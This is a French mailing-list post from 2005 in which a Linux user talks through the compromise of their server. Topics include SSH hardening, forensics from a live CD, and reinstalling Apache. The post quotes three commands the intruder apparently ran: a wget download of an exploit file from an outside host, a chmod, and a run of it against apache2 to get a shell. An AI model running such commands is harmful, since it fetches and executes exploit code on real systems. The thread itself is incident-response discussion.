[Linux-bruxelles] crack (c'est pas fini)
Alain BarBason
alain at barbason.be
Jeu 8 Sep 12:49:29 CEST 2005
Laurent Luyckx a écrit :
> On Thu, 2005-09-08 at 09:42 +0200, Alain BarBason wrote:
>
>>Tiens, j'ai souvenir qu'en telnet (peut-être), onne pouvait se connecter
>>en root, mais qu'on devait faire un "su" a partir d'un compte
>>utilisateur. Est-ce que ca vaut tjs la peine en ssh ,
>>Et donc plutot mettre
>>AllowUsers alain at 192.168.0.3
>>
>
> Y'as plus simple:
>
> PermitRootLogin no
en effet, mais l'idée première est d'empécher l'extérieur de se connecter.
>
> Je sais pas si tu peux te permettre de mettre ton serveur offline mais
> si j'etais toi, je rebooterai sur un live CD (style knoppix) et
> j'analyserai à l'aise mon serveur depuis ce live cd (en prenant soin
> d'abord d'enlever le cable reseau).
je dirais bien qu'il n'est pas si cracké que ça.
Je me demande s'il n'a pas chipoté dans apache2
> wget http://www.groupiys.net/xpl/kik
> chmod 777 kik
> ./kik "/usr/sbin/apache2" ./sh
j'ai bien récupérer kik, mais je ne vois pas ce qu'il fait, et si cela a
réussi.
J'ai désintaller/installer apache, mais ce n'est pas suffisant.
reste les script php ou autre. "gallery", "calendar", "phpBB",
"wikimedia",...
J'ai désactvié apache et je vais voir le resultat dans 24h.
--
by AlainBB
http://www.barbason.be:9673
Plus d'informations sur la liste de diffusion Linux-bruxelles